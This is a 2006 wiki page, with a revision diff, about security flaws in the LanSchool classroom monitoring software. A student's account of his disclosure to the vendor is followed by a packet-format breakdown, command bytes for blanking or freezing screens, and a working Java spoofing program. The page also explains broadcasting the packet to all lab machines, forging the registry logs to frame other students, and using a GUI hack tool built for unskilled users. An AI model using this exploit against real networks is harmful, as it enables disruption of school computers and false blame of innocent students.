LanSchool

From Compsci.ca Wiki

(Difference between revisions)
Jump to: navigation, search
Line 2: Line 2:
==What is LanSchool==
==What is LanSchool==
[[Image:Taskbar.JPG|thumb|What it looks like]]
[[Image:Taskbar.JPG|thumb|What it looks like]]
-
LanSchool is trojan horse type program used by many school boards in Ontario to spy on there students as well as control one or all computers in a given lab. It is another exmaple of the school boards spending money of software that they could get for free, with the free verson even being of higher quality. LanSchool has many flaws and security holes in its design as will be mentioned below.
+
LanSchool is trojan horse type program that is used by many school boards in Ontario to spy on their students as well as controlling one or all computers in a given lab. It is another example of the school boards spending money on software that they could get for free, with the free version even being of higher quality. LanSchool has many flaws in its design, and thus many security holes, which will be mentioned below.
<br><br>
<br><br>
The LanSchool website: http://www.lanschool.com/
The LanSchool website: http://www.lanschool.com/
Line 8: Line 8:
==The Story==
==The Story==
-
The Story as toald by [[Hacker Dan]]:
+
The Story as told by [[Hacker Dan]]:
-
<br><Br>
+
-
During grade 12 i chaged schools, the new school i whent to had alot better networks and computer labs witch was a good thing, or so i thought. After playing around for a bit i noticed a litte green icon in the tast bar that did not seem to do anyting. Looking feathure in to this i found out it was a progame named LanSchool (http://www.lanschool.com/). Now what is LanSchool you mayask, the names makes it sound insent enought, maybe somthing to help students? Well it may have started out that way but what it has become is basiclky a toringhorse progame for teachers to use to watch everything you are doing (incduing watching your screen) as well as giving them the ablity to control your computer or all computers in the lab at the same time. As ushealy the school borad decsied to spend money on somthing they could get for free and got a crapyer verson then what they could get for free.
+
<br><br>
<br><br>
-
So i started looking in to LanSchool more and found a demo verson on there site. This demo verson could not interact with real versons the school used and whould not allow studens to do any damge. 1st i looked in to how it was effecting the regiersy of the computers it was on, and found that every time the teacher application sent a comand to the student versons it recored what windows user sent the comand, the windows name of the computer they where on and the time in all regersitrys of every comp on the network. This ment that finding a full verson of the software althougth not hard whould end you up in alot of trouble unless you brought your own computer to school and even then still could.  
+
During Grade 12, I changed schools, and the new school that I went to had substantially better computing facilities. I thought this was a good thing, but after playing around for a bit, I noticed a little green icon in the system tray that did not seem to do anything. Looking in to this, I found out that it was a program named LanSchool (http://www.lanschool.com/). What is LanSchool you ask? The name makes it sound innocent enough, maybe something to help students? Well, it may have started out that way but what it has become is basically a Trojan horse program for teachers to use to watch everything that you are doing (inducing watching your screen) as well as giving them the ability to control your computer or all computers in the lab at the same time. As usual, the school board decided to spend money on something they could get for free and got a crappier version than what they could have got for free.  
<br><br>
<br><br>
-
So i begain to look at the packets it was send and to my shock they where UDP and not TCP and they had no ecription or coding at all to them. This means that it is exteramly easy to spoof the packets. So i quiclky wrote up a simple java progame to test out my theroy. Affter some time and exmermentation i decoded what most of the packets ment and was able to control the demo verson of LanSchool. Affter looking more at the packets i noticed that the difrces between the demo verson and the real verson is that the demo verso uses only one chanale witchis never used by the real verson. So it was simple a madder of chaing the chanel byte to a real chanle in the packet to get it to work with most if not all versons of LanSchool. Also this allowed me to make the regeisty logs say what ever i whonted, incuding blaming other stutdents for the hack.
+
So I started looking in to LanSchool more and found a demo version on their site. This demo version could not interact with real versions that the school used and would not allow students to do any damage. 1st, I looked in to how it used the registry of the computers that it was on, and found that every time the teacher application sent a command to the student versions it recorded which windows user sent the command, the computer name of the computer that they were on and the time in all registries of every computer on the network. This meant that finding a full version of the software, although not hard, would end you up in a lot of trouble unless you brought your own computer to school and even then still could.  
<br><br>
<br><br>
-
Now being the nice guy that i am i e-maied my findings to LanSchool and sugested several ways to fix this expolite. There repsoses was basiclky saying that they whould rather send time and effort enforcing the rules of the school and the law then fixing there progame. And made threats that legal aucation as well as sudesnions could take place if i where to use this progame. So next i whent to my school and aucatly demstorated (with there permision) the expoite and how unscure it was. Again nothing happend with my efforts so amoth latter i published how the packet worked on compsci.ca.  
+
So I began to look at the packets it was sending and to my shock they were UDP and not TCP and they had no encryption or coding to them at all. This means that it is extremely easy to spoof the packets. So I quickly wrote up a simple java program to test out my theory. After some time and experimentation, I decoded what most of the packets meant and was able to control the demo version of LanSchool. After looking more at the packets, I noticed that the differences between the demo version and the real version was that the demo version uses only one channel that is never used by the real version. So it was simple a matter of changing the channel byte to a real channel in the packet to get it to work with most, if not all, versions of LanSchool. Also this allowed me to make the registry logs say what ever I wanted, including blaming other students for the hack.  
<br><br>
<br><br>
-
It is now almost 2 years latter and i have rewriten my hack so any one even script kiddys can use it. With a nice gui and everything. My hope by doing this is to teach peoleop why progaming like LanSchool did is bad security wise and to encorge the school borad to buy (if they most) better software from comapnys that know what they are doing and are willing to chage with the times. BTW LanSchools website still claims that there are no know bugs with LanSchool.
+
Now being the nice guy that I am, I emailed my findings to LanSchool and suggested several ways to fix this exploit. There responses basically said that they would rather spend their time and effort enforcing the rules of the school and the law than fixing their program. They even made threats of legal action as well as suspensions that I could get were I to use this program. So next, I went to my school and actually demonstrated (with their permission) the exploit and how insecure the product was. Again, nothing happened as a result of my efforts, so a month later, I published how the system worked on compsci.ca.
 +
<br><br>
 +
It is now almost 2 years later, so I have rewritten my hack so anyone, even script kiddies can use it, even with a nice GUI and everything. My hope is that by doing this, I will teach people why programming software in the same way that LanSchool has been written is bad from a security and integrity viewpoint and to encourage the school board to buy (if they must use such software) better software from companies that know what they are doing and are willing to keep with the times. BTW, LanSchools website still claims that there are no known bugs with LanSchool.
<br><br><br>
<br><br><br>
==Communications with LanSchool==
==Communications with LanSchool==

Revision as of 23:08, 22 November 2006

Lanschool.JPG

Contents

What is LanSchool

What it looks like

LanSchool is trojan horse type program that is used by many school boards in Ontario to spy on their students as well as controlling one or all computers in a given lab. It is another example of the school boards spending money on software that they could get for free, with the free version even being of higher quality. LanSchool has many flaws in its design, and thus many security holes, which will be mentioned below.

The LanSchool website: http://www.lanschool.com/

The Story

The Story as told by Hacker Dan:

During Grade 12, I changed schools, and the new school that I went to had substantially better computing facilities. I thought this was a good thing, but after playing around for a bit, I noticed a little green icon in the system tray that did not seem to do anything. Looking in to this, I found out that it was a program named LanSchool (http://www.lanschool.com/). What is LanSchool you ask? The name makes it sound innocent enough, maybe something to help students? Well, it may have started out that way but what it has become is basically a Trojan horse program for teachers to use to watch everything that you are doing (inducing watching your screen) as well as giving them the ability to control your computer or all computers in the lab at the same time. As usual, the school board decided to spend money on something they could get for free and got a crappier version than what they could have got for free.

So I started looking in to LanSchool more and found a demo version on their site. This demo version could not interact with real versions that the school used and would not allow students to do any damage. 1st, I looked in to how it used the registry of the computers that it was on, and found that every time the teacher application sent a command to the student versions it recorded which windows user sent the command, the computer name of the computer that they were on and the time in all registries of every computer on the network. This meant that finding a full version of the software, although not hard, would end you up in a lot of trouble unless you brought your own computer to school and even then still could.

So I began to look at the packets it was sending and to my shock they were UDP and not TCP and they had no encryption or coding to them at all. This means that it is extremely easy to spoof the packets. So I quickly wrote up a simple java program to test out my theory. After some time and experimentation, I decoded what most of the packets meant and was able to control the demo version of LanSchool. After looking more at the packets, I noticed that the differences between the demo version and the real version was that the demo version uses only one channel that is never used by the real version. So it was simple a matter of changing the channel byte to a real channel in the packet to get it to work with most, if not all, versions of LanSchool. Also this allowed me to make the registry logs say what ever I wanted, including blaming other students for the hack.

Now being the nice guy that I am, I emailed my findings to LanSchool and suggested several ways to fix this exploit. There responses basically said that they would rather spend their time and effort enforcing the rules of the school and the law than fixing their program. They even made threats of legal action as well as suspensions that I could get were I to use this program. So next, I went to my school and actually demonstrated (with their permission) the exploit and how insecure the product was. Again, nothing happened as a result of my efforts, so a month later, I published how the system worked on compsci.ca.

It is now almost 2 years later, so I have rewritten my hack so anyone, even script kiddies can use it, even with a nice GUI and everything. My hope is that by doing this, I will teach people why programming software in the same way that LanSchool has been written is bad from a security and integrity viewpoint and to encourage the school board to buy (if they must use such software) better software from companies that know what they are doing and are willing to keep with the times. BTW, LanSchools website still claims that there are no known bugs with LanSchool.


Communications with LanSchool

Feb. 26th, 2006

To: LanSchool
From: Hacker Dan

Hello, i am writing to inform you have a security flaw in your software, LanSchool v6.5. As with pasted versions of LanSchool the packet is not secure and allows for manipulation by anyone on the network whether they have the teacher version of the software installed or not. This becomes even more concerning when you see that this allows the exploiter to set the logs that are stored in the registry to what ever they wont by manipulating that part of the packet. This would allow some students to exploit the network and then make it look like another student committed the attack from what ever computer they choice.

Also the scoop of this exploit would go beyond effecting one computer or on lab at a time. With a little thought the exploiter could effect all computers in a school running the software by rotating threw the channels. Or even worse the attacker could be used to effect all LanSchool installs on the net that are not protected by a firewall.

My recommendation would be to add some level of security to the packets like a password that is encrypted (threw md5 possible) and then checked on the client end agents a password it was installed with. This would make the system as secure as the password and encryption and would only require the installer of the software to add in one more field and you could still use UDP protocols with minimal modification to your code.




The Packet

This is what the packet looks like:

Mode | Version | Channel |00 or DF |DA | D1| ___data here__|__log info__|

Mode is basickly the comand you are send so far i have found alot of them and here are some expamles:

  • 00 - start boradcast of screens
  • 04 - restore computer screens
  • 07 - blaken all screens
  • 08 - unload lanschool or just frezz it up good



The verson corposneds to what verson of lanschool you are runing versons 5.x seem to like 01 and 02 seems to be for 6.x

The channel area is prity simple, it is the channel number. The demo verson uses channel FF in hex or 255 in dec.

The next 3 bytes are kind of hard to figgure out but seem to allways be the same in the give verson of lanschool. For 5.x and the low 6.xs the 1st byte here should be 00 for 6.5 and some others it should be DF in hex. The other 2 seem to allways be the same.

The data area is data for that comand, some comands do not need this like blacken all screens.

The log area is where it puts the name of your computer and then your username for loging. This area also has alot of useless 00 bytes that just take up space.

Application of the packet

The falowing is a very simple java application that will take adavagte of the above infomration to black out screens for the demo verson of 6.5 of lanschool only on the computer you are using. To send to all computers in a network you could use the ip 255.255.255.255

public class LanHack {

  public static void main(String args[])
  {
     try
     {
        InetAddress ipaddr=InetAddress.getByName("120.0.0.1");
        DatagramSocket mysocket=new DatagramSocket();
        byte sendbuf2[] = {(byte)0x07,(byte)0x02,(byte)0xff,(byte)0x3f,(byte)0xda, (byte)0xd1};
        DatagramPacket sendPacket2 = new DatagramPacket( sendbuf2, sendbuf2.length, ipaddr, 796);   
        mysocket.send(sendPacket2);
     }catch(Exception e){}
  } 

}

Note that for lesser verson of lanschool you whould have to chage the 0x3f to 0x00 and posibley 0x02 to 0x01 or another number. Aslo this is set to the demo chan 0xff and if u whonted to send to a real verson you whould have to set it to 0xChanNumberInHex.

LanSchooled

LanSchooled Screen Shot

Now for what i did with all this knogagel to make a point and click lanschool hack that can help you understand how the packets work. Rember that this is only for educational use and should not be used for evil purposes and i take no respoblity for what you do with it. With that side, i only tested it on the demo verson but i whould like to hear from peoleop if they got it to work on other versons.

How to use

The top frame shows the packet that will be sent, you can use the easy set up buttions below it to set the packet to do what you whont. The times bar will let you say how many times you whont to send out the packet.

Seting the channel to "ALL" will send to all posiable lanschool channels incuding the demo one. Seting the verson to "9" will send a verson 2 but with 0x00 rather then 0xdf. Seting to "2" will send verson 2 but with 0xdf. All other verson numbers send there verson and 0x00.

The log info lets you set what to set the name and comp name of in the regersity logs of the computers effected. I whould storgy remocmend peoleop not expoit this to get peoleop in thoruble since that is just evil.

You most hit send to aucatly send the packet. The easy set up buttions just configer the packet you are going to send.

Where to get

Personal tools